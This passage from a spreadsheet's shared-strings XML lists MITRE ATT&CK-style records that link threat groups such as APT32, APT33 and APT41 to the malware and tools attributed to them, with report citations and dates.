    <t>relationship--d924c061-9ee2-45c2-9ea4-491a2d3f50a5</t>
  </si>
  <si>
    <t>S0111</t>
  </si>
  <si>
    <t>schtasks</t>
  </si>
  <si>
    <t>tool--c9703cd3-141c-43a0-a926-380082be5d04</t>
  </si>
  <si>
    <t>(Citation: FireEye Operation Double Tap)</t>
  </si>
  <si>
    <t>relationship--1c812537-dfaf-40da-a71b-a49c18870b77</t>
  </si>
  <si>
    <t>G0013</t>
  </si>
  <si>
    <t>APT30</t>
  </si>
  <si>
    <t>intrusion-set--f047ee18-7985-4946-8bfb-4ed754d3a0dd</t>
  </si>
  <si>
    <t>S0031</t>
  </si>
  <si>
    <t>BACKSPACE</t>
  </si>
  <si>
    <t>malware--fb261c56-b80e-43a9-8351-c84081e7213d</t>
  </si>
  <si>
    <t>(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>relationship--9820c1e9-a414-4af1-a78c-aaf2cb164361</t>
  </si>
  <si>
    <t>S0036</t>
  </si>
  <si>
    <t>FLASHFLOOD</t>
  </si>
  <si>
    <t>malware--43213480-78f7-4fb3-976f-d48f5f6a4c2a</t>
  </si>
  <si>
    <t>relationship--a18071ad-fe4f-4014-ad9a-1b0a66df3eab</t>
  </si>
  <si>
    <t>S0034</t>
  </si>
  <si>
    <t>NETEAGLE</t>
  </si>
  <si>
    <t>malware--53cf6cc4-65aa-445a-bcf8-c3d296f8a7a2</t>
  </si>
  <si>
    <t>relationship--a5015a35-a6a2-4289-8d79-79b583c23e63</t>
  </si>
  <si>
    <t>S0028</t>
  </si>
  <si>
    <t>SHIPSHAPE</t>
  </si>
  <si>
    <t>malware--b1de6916-7a22-4460-8d26-6b5483ffaa2a</t>
  </si>
  <si>
    <t>relationship--08d91d3c-b7c7-4cbc-a4eb-29edd3be3e3a</t>
  </si>
  <si>
    <t>S0035</t>
  </si>
  <si>
    <t>SPACESHIP</t>
  </si>
  <si>
    <t>malware--8b880b41-5139-4807-baa9-309690218719</t>
  </si>
  <si>
    <t>relationship--fca5a601-68fd-4b20-ad1e-0592cadecb73</t>
  </si>
  <si>
    <t>G0050</t>
  </si>
  <si>
    <t>APT32</t>
  </si>
  <si>
    <t>intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e</t>
  </si>
  <si>
    <t>(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--c9660ab0-33d4-434d-833f-cc1969b04f7a</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</si>
  <si>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</si>
  <si>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relationship--4ef9490e-e347-4f4e-aa6f-c082e02349fc</t>
  </si>
  <si>
    <t>S0354</t>
  </si>
  <si>
    <t>Denis</t>
  </si>
  <si>
    <t>malware--f25aab1a-0cef-4910-a85d-bb38b32ea41a</t>
  </si>
  <si>
    <t>(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--e25ea0c4-513b-489d-943d-2828034f764f</t>
  </si>
  <si>
    <t>S0477</t>
  </si>
  <si>
    <t>Goopy</t>
  </si>
  <si>
    <t>malware--eac3d77f-2b7b-4599-ba74-948dc16633ad</t>
  </si>
  <si>
    <t>relationship--f7ea9daf-5233-48b3-918f-9cea402b708f</t>
  </si>
  <si>
    <t>19 June 2020</t>
  </si>
  <si>
    <t>S0156</t>
  </si>
  <si>
    <t>KOMPROGO</t>
  </si>
  <si>
    <t>malware--7dbb67c7-270a-40ad-836e-c45f8948aa5a</t>
  </si>
  <si>
    <t>(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>relationship--5ccd4b15-ef11-4b89-b0e1-4dd714fa2fb5</t>
  </si>
  <si>
    <t>S0585</t>
  </si>
  <si>
    <t>Kerrdown</t>
  </si>
  <si>
    <t>malware--8c1d01ff-fdc0-4586-99bd-c248e0761af5</t>
  </si>
  <si>
    <t>(Citation: Amnesty Intl. Ocean Lotus February 2021)(Citation: Unit 42 KerrDown February 2019)</t>
  </si>
  <si>
    <t>relationship--3502b4bb-0e14-46b3-a92c-ba1c9d574259</t>
  </si>
  <si>
    <t>24 September 2021</t>
  </si>
  <si>
    <t>(Citation: FireEye APT32 May 2017)(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>relationship--032fb34d-3434-4667-9d5e-6bb9fd6b7d00</t>
  </si>
  <si>
    <t>relationship--e725bb68-9fe3-4c43-8ef5-57d57b40b066</t>
  </si>
  <si>
    <t>S0352</t>
  </si>
  <si>
    <t>OSX_OCEANLOTUS.D</t>
  </si>
  <si>
    <t>malware--b00f90b6-c75c-4bfd-b813-ca9e6c9ebf29</t>
  </si>
  <si>
    <t>(Citation: TrendMicro MacOS April 2018)(Citation: Amnesty Intl. Ocean Lotus February 2021)</t>
  </si>
  <si>
    <t>relationship--56f587e1-d7c3-4489-945e-58c4ee3e4ba7</t>
  </si>
  <si>
    <t>S0158</t>
  </si>
  <si>
    <t>PHOREAL</t>
  </si>
  <si>
    <t>malware--f6ae7a52-f3b6-4525-9daf-640c083f006e</t>
  </si>
  <si>
    <t>relationship--bb8fd9d4-4362-40c6-ab09-f05f843c2cef</t>
  </si>
  <si>
    <t>S1078</t>
  </si>
  <si>
    <t>RotaJakiro</t>
  </si>
  <si>
    <t>malware--08e844a8-371f-4fe3-9d1f-e056e64a7fde</t>
  </si>
  <si>
    <t>(Citation: netlab360 rotajakiro vs oceanlotus)</t>
  </si>
  <si>
    <t>relationship--a17eaa6b-8ef7-459e-a2e7-2d25e767370e</t>
  </si>
  <si>
    <t>S0157</t>
  </si>
  <si>
    <t>SOUNDBITE</t>
  </si>
  <si>
    <t>malware--9ca488bd-9587-48ef-b923-1743523e63b2</t>
  </si>
  <si>
    <t>relationship--55f58d30-b633-4094-97bb-6ab872c0f480</t>
  </si>
  <si>
    <t>S0155</t>
  </si>
  <si>
    <t>WINDSHIELD</t>
  </si>
  <si>
    <t>malware--98e8a977-3416-43aa-87fa-33e287e9c14c</t>
  </si>
  <si>
    <t>relationship--d9c29485-ced4-4ebc-880c-31d35dd54b26</t>
  </si>
  <si>
    <t>relationship--1c01c64c-8842-44be-bd66-8355eb5d543c</t>
  </si>
  <si>
    <t>relationship--9c97e0aa-61fd-4f42-881f-763a1b03c16b</t>
  </si>
  <si>
    <t>G0064</t>
  </si>
  <si>
    <t>APT33</t>
  </si>
  <si>
    <t>intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f</t>
  </si>
  <si>
    <t>S0129</t>
  </si>
  <si>
    <t>AutoIt backdoor</t>
  </si>
  <si>
    <t>malware--f5352566-1a64-49ac-8f7f-97e1d1a03300</t>
  </si>
  <si>
    <t>(Citation: Symantec Elfin Mar 2019)</t>
  </si>
  <si>
    <t>relationship--253ab30c-ec7c-42bc-a27d-984722c59a98</t>
  </si>
  <si>
    <t>10 April 2019</t>
  </si>
  <si>
    <t>(Citation: FireEye APT33 Guardrail)(Citation: Symantec Elfin Mar 2019)</t>
  </si>
  <si>
    <t>relationship--d3b5af98-ac27-4135-9da6-8e917cc0769d</t>
  </si>
  <si>
    <t>relationship--9d4aa0d4-b460-4320-8c46-2d6ffbe675af</t>
  </si>
  <si>
    <t>relationship--3b056bef-e49e-4611-8c20-23cc14689b74</t>
  </si>
  <si>
    <t>S0198</t>
  </si>
  <si>
    <t>NETWIRE</t>
  </si>
  <si>
    <t>malware--2a70812b-f1ef-44db-8578-a496a227aef2</t>
  </si>
  <si>
    <t>(Citation: FireEye APT33 Sept 2017)(Citation: FireEye APT33 Webinar Sept 2017)</t>
  </si>
  <si>
    <t>relationship--c775ee2d-b7eb-443a-94e9-bb450e2bcd35</t>
  </si>
  <si>
    <t>S0336</t>
  </si>
  <si>
    <t>NanoCore</t>
  </si>
  <si>
    <t>malware--b4d80f8b-d2b9-4448-8844-4bef777ed676</t>
  </si>
  <si>
    <t>(Citation: FireEye APT33 Webinar Sept 2017)</t>
  </si>
  <si>
    <t>relationship--57a7fefa-774b-4653-af2d-ebf3e2e315ce</t>
  </si>
  <si>
    <t>29 January 2019</t>
  </si>
  <si>
    <t>relationship--d22af09f-5536-4416-827c-e401cfae3002</t>
  </si>
  <si>
    <t>S0371</t>
  </si>
  <si>
    <t>POWERTON</t>
  </si>
  <si>
    <t>malware--e85cae1a-bce3-4ac4-b36b-b00acac0567b</t>
  </si>
  <si>
    <t>(Citation: FireEye APT33 Guardrail)(Citation: Microsoft Holmium June 2020)</t>
  </si>
  <si>
    <t>relationship--6ea02c5b-f60b-4774-a237-fcc3f498a4f5</t>
  </si>
  <si>
    <t>22 June 2020</t>
  </si>
  <si>
    <t>S0378</t>
  </si>
  <si>
    <t>PoshC2</t>
  </si>
  <si>
    <t>tool--4b57c098-f043-4da2-83ef-7588a6d426bc</t>
  </si>
  <si>
    <t>relationship--27f3f0b2-4743-420d-a4dd-842de6cb9e70</t>
  </si>
  <si>
    <t>23 April 2019</t>
  </si>
  <si>
    <t>(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>relationship--148d82d9-c55b-4ce4-adb2-79387dab01ab</t>
  </si>
  <si>
    <t>S0192</t>
  </si>
  <si>
    <t>Pupy</t>
  </si>
  <si>
    <t>tool--cb69b20d-56d0-41ab-8440-4a4b251614d4</t>
  </si>
  <si>
    <t>relationship--d2c3b075-5299-42e5-95de-8248dc0da551</t>
  </si>
  <si>
    <t>13 March 2019</t>
  </si>
  <si>
    <t>S0358</t>
  </si>
  <si>
    <t>Ruler</t>
  </si>
  <si>
    <t>tool--90ac9266-68ce-46f2-b24f-5eb3b2a8ea38</t>
  </si>
  <si>
    <t>relationship--33f1d509-3bca-492a-a08b-9e0561433b5f</t>
  </si>
  <si>
    <t>05 February 2019</t>
  </si>
  <si>
    <t>S0380</t>
  </si>
  <si>
    <t>StoneDrill</t>
  </si>
  <si>
    <t>malware--8dbadf80-468c-4a62-b817-4e4d8b606887</t>
  </si>
  <si>
    <t>(Citation: FireEye APT33 Sept 2017)</t>
  </si>
  <si>
    <t>relationship--65321ae3-b76c-4288-9456-207641b14aa7</t>
  </si>
  <si>
    <t>S0199</t>
  </si>
  <si>
    <t>TURNEDUP</t>
  </si>
  <si>
    <t>malware--db1355a7-e5c9-4e2c-8da7-eccf2ae9bf5c</t>
  </si>
  <si>
    <t>(Citation: FireEye APT33 Sept 2017)(Citation: FireEye APT33 Webinar Sept 2017)(Citation: Symantec Elfin Mar 2019)</t>
  </si>
  <si>
    <t>relationship--a36bddd3-6993-4f3f-9298-cba2868438b2</t>
  </si>
  <si>
    <t>S0095</t>
  </si>
  <si>
    <t>ftp</t>
  </si>
  <si>
    <t>tool--cf23bf4a-e003-4116-bbae-1ea6c558d565</t>
  </si>
  <si>
    <t>relationship--fca4685f-76c5-4089-b318-8f2ebab802d0</t>
  </si>
  <si>
    <t>G0067</t>
  </si>
  <si>
    <t>APT37</t>
  </si>
  <si>
    <t>intrusion-set--4a2ce82e-1a74-468a-a6fb-bbead541383c</t>
  </si>
  <si>
    <t>S0657</t>
  </si>
  <si>
    <t>BLUELIGHT</t>
  </si>
  <si>
    <t>malware--8bd47506-29ae-44ea-a5c1-c57e8a1ab6b0</t>
  </si>
  <si>
    <t>(Citation: Volexity InkySquid BLUELIGHT August 2021)</t>
  </si>
  <si>
    <t>relationship--18c39a72-26d4-4e43-ad59-d3dcdacc592f</t>
  </si>
  <si>
    <t>S0212</t>
  </si>
  <si>
    <t>CORALDECK</t>
  </si>
  <si>
    <t>malware--8ab98e25-1672-4b5f-a2fb-e60f08a5ea9e</t>
  </si>
  <si>
    <t>(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>relationship--1e27ff4a-fa86-46b1-8aea-748ec398b47e</t>
  </si>
  <si>
    <t>relationship--e614a9ca-a922-4594-a929-30dd542d83ce</t>
  </si>
  <si>
    <t>S0213</t>
  </si>
  <si>
    <t>DOGCALL</t>
  </si>
  <si>
    <t>malware--0852567d-7958-4f4b-8947-4f840ec8d57d</t>
  </si>
  <si>
    <t>(Citation: FireEye APT37 Feb 2018)(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>relationship--fcdfad8a-73d5-4d8f-ab0d-24f847d675a0</t>
  </si>
  <si>
    <t>S0355</t>
  </si>
  <si>
    <t>Final1stspy</t>
  </si>
  <si>
    <t>malware--a2282af0-f9dd-4373-9b92-eaf9e11e0c71</t>
  </si>
  <si>
    <t>(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>relationship--e18e5899-894b-4889-b008-77b44dbc0fce</t>
  </si>
  <si>
    <t>S0214</t>
  </si>
  <si>
    <t>HAPPYWORK</t>
  </si>
  <si>
    <t>malware--211cfe9f-2676-4e1c-a5f5-2c8091da2a68</t>
  </si>
  <si>
    <t>relationship--baa9bb45-b4d2-4eea-803f-d2d1126330d4</t>
  </si>
  <si>
    <t>S0215</t>
  </si>
  <si>
    <t>KARAE</t>
  </si>
  <si>
    <t>malware--3c02fb1f-cbdb-48f5-abaf-8c81d6e0c322</t>
  </si>
  <si>
    <t>relationship--21c14374-e5a7-4a68-8ae8-12d5e47c1e63</t>
  </si>
  <si>
    <t>S0247</t>
  </si>
  <si>
    <t>NavRAT</t>
  </si>
  <si>
    <t>malware--53a42597-1974-4b8e-84fd-3675e8992053</t>
  </si>
  <si>
    <t>(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>relationship--e6f81b9c-8fda-49f5-a944-265f5bad82ba</t>
  </si>
  <si>
    <t>S0216</t>
  </si>
  <si>
    <t>POORAIM</t>
  </si>
  <si>
    <t>malware--53d47b09-09c2-4015-8d37-6633ecd53f79</t>
  </si>
  <si>
    <t>relationship--a39bea46-92a8-49cf-ae3f-d78f4d3f23cf</t>
  </si>
  <si>
    <t>S0240</t>
  </si>
  <si>
    <t>ROKRAT</t>
  </si>
  <si>
    <t>malware--60a9c2f0-b7a5-4e8e-959c-e1a3ff314a5f</t>
  </si>
  <si>
    <t>(Citation: Talos Group123)(Citation: Securelist ScarCruft May 2019)</t>
  </si>
  <si>
    <t>relationship--7aea964a-cd9b-471e-bc7b-2a270c974289</t>
  </si>
  <si>
    <t>S0217</t>
  </si>
  <si>
    <t>SHUTTERSPEED</t>
  </si>
  <si>
    <t>malware--4189a679-72ed-4a89-a57c-7f689712ecf8</t>
  </si>
  <si>
    <t>relationship--84eee49c-e49a-40d1-bdc1-89c613636ef9</t>
  </si>
  <si>
    <t>S0218</t>
  </si>
  <si>
    <t>SLOWDRIFT</t>
  </si>
  <si>
    <t>malware--414dc555-c79e-4b24-a2da-9b607f7eaf16</t>
  </si>
  <si>
    <t>relationship--25e301f8-0bb7-4769-94be-ac96b2319c85</t>
  </si>
  <si>
    <t>S0219</t>
  </si>
  <si>
    <t>WINERACK</t>
  </si>
  <si>
    <t>malware--49abab73-3c5c-476e-afd5-69b5c732d845</t>
  </si>
  <si>
    <t>relationship--fdf161e2-46dc-41ee-bec4-9b18c8b1e6d9</t>
  </si>
  <si>
    <t>G0082</t>
  </si>
  <si>
    <t>APT38</t>
  </si>
  <si>
    <t>intrusion-set--00f67a77-86a4-4adf-be26-1a54fc713340</t>
  </si>
  <si>
    <t>S0334</t>
  </si>
  <si>
    <t>DarkComet</t>
  </si>
  <si>
    <t>malware--53ab35c2-d00e-491a-8753-41d35ae7e547</t>
  </si>
  <si>
    <t>(Citation: FireEye APT38 Oct 2018)</t>
  </si>
  <si>
    <t>relationship--e9e35351-d53c-4ea3-a439-d43bd636ae32</t>
  </si>
  <si>
    <t>S0593</t>
  </si>
  <si>
    <t>ECCENTRICBANDWAGON</t>
  </si>
  <si>
    <t>malware--e928333f-f3df-4039-9b8b-556c2add0e42</t>
  </si>
  <si>
    <t>(Citation: CISA AA20-239A BeagleBoyz August 2020)</t>
  </si>
  <si>
    <t>relationship--10a5f6e2-9527-419a-b2f4-29087e05cf2d</t>
  </si>
  <si>
    <t>S0376</t>
  </si>
  <si>
    <t>HOPLIGHT</t>
  </si>
  <si>
    <t>malware--454fe82d-6fd2-4ac6-91ab-28a33fe01369</t>
  </si>
  <si>
    <t>relationship--41bdaca0-cda7-49ee-a879-bb0dfb0ba6d4</t>
  </si>
  <si>
    <t>(Citation: ESET Lazarus KillDisk April 2018)</t>
  </si>
  <si>
    <t>relationship--cb1037c1-4b83-4a79-ba12-00558bb6b42b</t>
  </si>
  <si>
    <t>relationship--b56a1198-e23a-48f4-9744-7a6f087b79a3</t>
  </si>
  <si>
    <t>relationship--1f0832ca-30f2-4f5a-8e92-1d15222fc087</t>
  </si>
  <si>
    <t>G0087</t>
  </si>
  <si>
    <t>APT39</t>
  </si>
  <si>
    <t>intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80</t>
  </si>
  <si>
    <t>(Citation: FireEye APT39 Jan 2019)</t>
  </si>
  <si>
    <t>relationship--9cc2f27e-bf85-4471-8be5-0cf614cd5840</t>
  </si>
  <si>
    <t>21 February 2019</t>
  </si>
  <si>
    <t>S0454</t>
  </si>
  <si>
    <t>Cadelspy</t>
  </si>
  <si>
    <t>malware--a705b085-1eae-455e-8f4d-842483d814eb</t>
  </si>
  <si>
    <t>(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>relationship--5e2b2df2-e54f-44b5-bd86-fefdae513bc2</t>
  </si>
  <si>
    <t>22 May 2020</t>
  </si>
  <si>
    <t>S0488</t>
  </si>
  <si>
    <t>CrackMapExec</t>
  </si>
  <si>
    <t>tool--c4810609-7da6-48ec-8057-1b70a7814db0</t>
  </si>
  <si>
    <t>(Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)</t>
  </si>
  <si>
    <t>relationship--37fee9dc-701e-49be-8cec-b2fde4b533d8</t>
  </si>
  <si>
    <t>17 July 2020</t>
  </si>
  <si>
    <t>S0459</t>
  </si>
  <si>
    <t>MechaFlounder</t>
  </si>
  <si>
    <t>malware--dfa03c7d-79ed-4ce2-b9d1-ddc9dbf56ad2</t>
  </si>
  <si>
    <t>(Citation: Unit 42 MechaFlounder March 2019)</t>
  </si>
  <si>
    <t>relationship--21d94923-38bb-489d-bc6a-23e03fef7b91</t>
  </si>
  <si>
    <t>28 May 2020</t>
  </si>
  <si>
    <t>(Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)(Citation: Dark Reading APT39 JAN 2019)(Citation: Symantec Chafer February 2018)</t>
  </si>
  <si>
    <t>relationship--47b76f42-e305-4aac-a1cc-d7cb84b1d8bf</t>
  </si>
  <si>
    <t>S0590</t>
  </si>
  <si>
    <t>NBTscan</t>
  </si>
  <si>
    <t>tool--b63970b7-ddfb-4aee-97b1-80d335e033a8</t>
  </si>
  <si>
    <t>relationship--05509bce-dc88-4cc9-8c39-40549cbc8603</t>
  </si>
  <si>
    <t>(Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)(Citation: Symantec Chafer February 2018)</t>
  </si>
  <si>
    <t>relationship--66e8d05b-6f51-461d-aec0-266970064939</t>
  </si>
  <si>
    <t>S0375</t>
  </si>
  <si>
    <t>Remexi</t>
  </si>
  <si>
    <t>malware--ecc2f65a-b452-4eaf-9689-7e181f17f7a5</t>
  </si>
  <si>
    <t>(Citation: Symantec Chafer Dec 2015)(Citation: Securelist Remexi Jan 2019)(Citation: Symantec Chafer February 2018)</t>
  </si>
  <si>
    <t>relationship--2a37ddb3-56ef-4c2d-bec7-d6060eb0215a</t>
  </si>
  <si>
    <t>S0005</t>
  </si>
  <si>
    <t>Windows Credential Editor</t>
  </si>
  <si>
    <t>tool--242f3da3-4425-4d11-8f5c-b842886da966</t>
  </si>
  <si>
    <t>(Citation: FireEye APT39 Jan 2019)(Citation: Dark Reading APT39 JAN 2019)</t>
  </si>
  <si>
    <t>relationship--4ecf2ecd-ae5a-417b-a6a7-9690fb83a282</t>
  </si>
  <si>
    <t>(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>relationship--d741a245-42ea-4bd4-bfb5-5687981e46b3</t>
  </si>
  <si>
    <t>(Citation: Symantec Chafer February 2018)</t>
  </si>
  <si>
    <t>relationship--3b1a912a-9854-428f-9dde-bd2100c554d8</t>
  </si>
  <si>
    <t>(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>relationship--15d39425-c748-442e-a8d0-de8ab3668cdd</t>
  </si>
  <si>
    <t>23 September 2019</t>
  </si>
  <si>
    <t>S0190</t>
  </si>
  <si>
    <t>BITSAdmin</t>
  </si>
  <si>
    <t>tool--64764dc6-a032-495f-8250-1e4c06bdc163</t>
  </si>
  <si>
    <t>(Citation: FireEye APT41 March 2020)</t>
  </si>
  <si>
    <t>relationship--202e5e50-09e4-431b-a786-d846beb5e009</t>
  </si>
  <si>
    <t>relationship--c616ad2c-cfa1-4629-8f84-f102c7bc8d09</t>
  </si>
  <si>
    <t>S0020</t>
  </si>
  <si>
    <t>China Chopper</t>
  </si>
  <si>
    <t>malware--5a3a31fe-5a8f-48e1-bff0-a753e5b1be70</t>
  </si>
  <si>
    <t>relationship--734251a0-1a99-48f5-8b37-192a657a430e</t>
  </si>
  <si>
    <t>(Citation: FireEye APT41 March 2020)(Citation: Group IB APT 41 June 2021)</t>
  </si>
  <si>
    <t>relationship--b6f1f9f1-05d9-4ac6-b191-404443430b2b</t>
  </si>
  <si>
    <t>S0021</t>
  </si>
  <si>
    <t>Derusbi</t>
  </si>
  <si>
    <t>malware--94379dec-5c87-49db-b36e-66abc0b81344</t>
  </si>
  <si>
    <t>relationship--fb1079fa-f399-48b3-aa34-ca096bed13c6</t>
  </si>
  <si>
    <t>(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>relationship--b4e20afc-56a8-4a05-8f73-076b17e3794e</t>
  </si>
  <si>
    <t>22 December 2020</t>
  </si>
  <si>
    <t>relationship--555b9de4-84c6-44f1-a6e6-b04a7e4ed374</t>
  </si>
  <si>
    <t>S0443</t>
  </si>
  <si>
    <t>MESSAGETAP</t>
  </si>
  <si>
    <t>malware--9b19d6b4-cfcb-492f-8ca8-8449e7331573</t>
  </si>
  <si>
    <t>(Citation: FireEye MESSAGETAP October 2019)(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>relationship--95a4d32c-7705-4527-abd8-9d2aca70dbc0</t>
  </si>
  <si>
    <t>12 May 2020</t>
  </si>
  <si>
    <t>21 December 2020</t>
  </si>
  <si>
    <t>(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)</t>
  </si>
  <si>
    <t>relationship--9be3defb-cc1d-4d8f-b0a8-bc153b0f1947</t>
  </si>
  <si>
    <t>relationship--66d42126-d337-4a00-ae35-d8af7203a6eb</t>
  </si>
  <si>
    <t>01 May 2020</t>
  </si>
  <si>
    <t>relationship--5bfd02aa-acc6-47a0-8867-d7962ce775f6</t>
  </si>
  <si>
    <t>24 September 2019</t>
  </si>
  <si>
    <t>relationship--22af1cbd-a7fd-4d9f-ba15-d640c217603e</t>
  </si>
  <si>
    <t>relationship--48c34dc3-0c3f-426d-b99a-b72e595da287</t>
  </si>
  <si>
    <t>S0112</t>
  </si>
  <si>
    <t>ROCKBOOT</t>
  </si>
  <si>
    <t>malware--cba78a1c-186f-4112-9e6a-be1839f030f7</t>
  </si>
  <si>
    <t>relationship--d12978f9-a02b-4be1-9e21-f2050e28ddb8</t>
  </si>
  <si>
    <t>S0596</t>
  </si>
  <si>
    <t>ShadowPad</t>
  </si>
  <si>
    <t>malware--ec9e00dd-0313-4d5b-8105-c20aa47abffc</t>
  </si>
  <si>
    <t>(Citation: FireEye APT41 Aug 2019)(Citation: Recorded Future RedEcho Feb 2021)</t>
  </si>
  <si>
    <t>relationship--79189147-fe44-4ce0-8afb-9b95f8ce16df</t>
  </si>
  <si>
    <t>23 March 2021</t>
  </si>
  <si>
    <t>S0430</t>
  </si>
  <si>
    <t>Winnti for Linux</t>
  </si>
  <si>
    <t>malware--8787e86d-8475-4f13-acea-d33eb83b6105</t>
  </si>
  <si>
    <t>relationship--f3f5301d-8861-4c8b-9e28-36aa8581c552</t>
  </si>
  <si>
    <t>S0412</t>
  </si>
  <si>
    <t>ZxShell</t>
  </si>
  <si>
    <t>malware--cfc75b0d-e579-40ae-ad07-a1ce00d49a6c</t>
  </si>
  <si>
    <t>relationship--4d1d7045-4492-492c-9522-2885d6bd96f6</t>
  </si>
  <si>
    <t>relationship--9cdb5a1a-a68f-4ee2-a807-ba4c0ae8e436</t>
  </si>
  <si>
    <t>relationship--e1f948d0-7627-408c-a2c9-669e30e43782</t>
  </si>
  <si>
    <t>relationship--fc86f198-f9d7-4b95-b26a-9cb9b922f2f1</t>
  </si>
  <si>
    <t>relationship--37e520de-fe38-450b-a30e-3372f7ff3a4f</t>
  </si>
  <si>
    <t>(Citation: Group IB APT 41 June 2021)</t>
  </si>
  <si>
    <t>relationship--694d94db-3297-4be1-ab01-7b574ee5f4e5</t>
  </si>
  <si>
    <t>relationship--3f27ef2a-48e8-4d37-8618-fe61dfcafd3e</t>
  </si>
  <si>
    <t>relationship--ac612e35-03c6-4b14-9348-dea8119c593a</t>
  </si>
  <si>
    <t>relationship--b98ed6ce-be41-4388-ac56-35b4e2a0bbe6</t>
  </si>
  <si>
    <t>G0130</t>
  </si>
  <si>
    <t>Ajax Security Team</t>
  </si>
  <si>
    <t>intrusion-set--fa19de15-6169-428d-9cd6-3ca3d56075b7</t>
  </si>
  <si>
    <t>S0224</t>
  </si>
  <si>
    <t>Havij</t>
  </si>
  <si>
    <t>tool--fbd727ea-c0dc-42a9-8448-9e12962d1ab5</t>
  </si>
  <si>
    <t>(Citation: Check Point Rocket Kitten)</t>
  </si>
  <si>
    <t>relationship--12e483aa-14a0-41ea-b6fd-7ced3590472b</t>
  </si>
  <si>
    <t>S0225</t>
  </si>
  <si>
    <t>sqlmap</t>
  </si>
  <si>
    <t>tool--9a2640c2-9f43-46fe-b13f-bde881e55555</t>
  </si>
  <si>
    <t>relationship--03632545-0422-4b88-b5c8-f3b52ccfd28f</t>
  </si>
  <si>
    <t>G0138</t>
  </si>
  <si>
    <t>Andariel</t>
  </si>
  <si>
    <t>intrusion-set--39d6890e-7f23-4474-b8ef-e7b0343c5fc8</t>
  </si>
  <si>
    <t>S0433</t>
  </si>
  <si>
    <t>Rifdoor</t>
  </si>
  <si>
    <t>malware--44c75271-0e4d-496f-ae0a-a6d883a42a65</t>
  </si>
  <si>
    <t>(Citation: AhnLab Andariel Subgroup of Lazarus June 2018)</t>
  </si>
  <si>
    <t>relationship--02aaa58a-483c-43ec-ad99-a56da68a6298</t>
  </si>
  <si>
    <t>30 November 2022</t>
  </si>
  <si>
    <t>relationship--daabfd4e-f873-4afc-8f39-fc5daf7cd71a</t>
  </si>
  <si>
    <t>G1007</t>
  </si>
  <si>
    <t>Aoqin Dragon</t>
  </si>
  <si>
    <t>intrusion-set--64d5f96a-f121-4d19-89f6-6709f5c49faa</t>
  </si>
  <si>
    <t>S1027</t>
  </si>
  <si>
    <t>Heyoka Backdoor</t>
  </si>
  <si>
    <t>malware--dff90475-9f72-41a6-84ed-1fbefd3874c0</t>
  </si>
  <si>
    <t>(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>relationship--db7aadec-757b-49b3-8691-1f23b5c7c5fc</t>
  </si>
  <si>
    <t>S1026</t>
  </si>
  <si>
    <t>Mongall</t>
  </si>
  <si>
    <t>malware--6fb36c6f-bb3d-4ed6-9471-cb9933e5c154</t>
  </si>
  <si>
    <t>relationship--4753b372-6ac2-4a0e-8e0c-1a14c884fa8e</t>
  </si>
  <si>
    <t>G0143</t>
  </si>
  <si>
    <t>Aquatic Panda</t>
  </si>
  <si>
    <t>intrusion-set--64b52e7d-b2c4-4a02-9372-08a463f5dc11</t>
  </si>
  <si>
    <t>(Citation: CrowdStrike AQUATIC PANDA December 2021)</t>
  </si>
  <si>
    <t>relationship--ba215171-4b5b-407f-931e-0d97ddb64909</t>
  </si>
  <si>
    <t>18 January 2022</t>
  </si>
  <si>
    <t>relationship--9c0bf8de-7366-46a4-a1b9-b6a72937c8db</t>
  </si>
  <si>
    <t>G0001</t>
  </si>
  <si>
    <t>Axiom</t>
  </si>
  <si>
    <t>intrusion-set--a0cb9370-e39b-44d5-9f50-ef78e412b973</t>
  </si>
  <si>
    <t>(Citation: Novetta-Axiom)(Citation: Cisco Group 72)</t>
  </si>
  <si>
    <t>relationship--e4c7c4b7-fe19-4433-acd9-ec94f436f381</t>
  </si>
  <si>
    <t>S0009</t>
  </si>
  <si>
    <t>Hikit</t>
  </si>
  <si>
    <t>malware--95047f03-4811-4300-922e-1ba937d53a61</t>
  </si>
  <si>
    <t>relationship--a8122755-90fe-4b68-8fa1-55ed7be90931</t>
  </si>
  <si>
    <t>S0203</t>
  </si>
  <si>
    <t>Hydraq</t>
  </si>
  <si>
    <t>malware--73a4793a-ce55-4159-b2a6-208ef29b326f</t>
  </si>
  <si>
    <t>relationship--f0094ba8-a513-49bf-a5d7-961aaab13380</t>
  </si>
  <si>
    <t>(Citation: Cisco Group 72)(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>relationship--5ee26367-1517-4fda-9dbe-8f9e63cc01eb</t>
  </si>
  <si>
    <t>relationship--abe1a402-9ad5-43d0-9e5d-cabe4269fc06</t>
  </si>
  <si>
    <t>S0672</t>
  </si>
  <si>
    <t>Zox</t>
  </si>
  <si>
    <t>malware--fb28627c-d6ea-4c35-b138-ab5e96ae5445</t>
  </si>
  <si>
    <t>(Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>relationship--5329433a-2e84-4f56-b933-01620892e333</t>
  </si>
  <si>
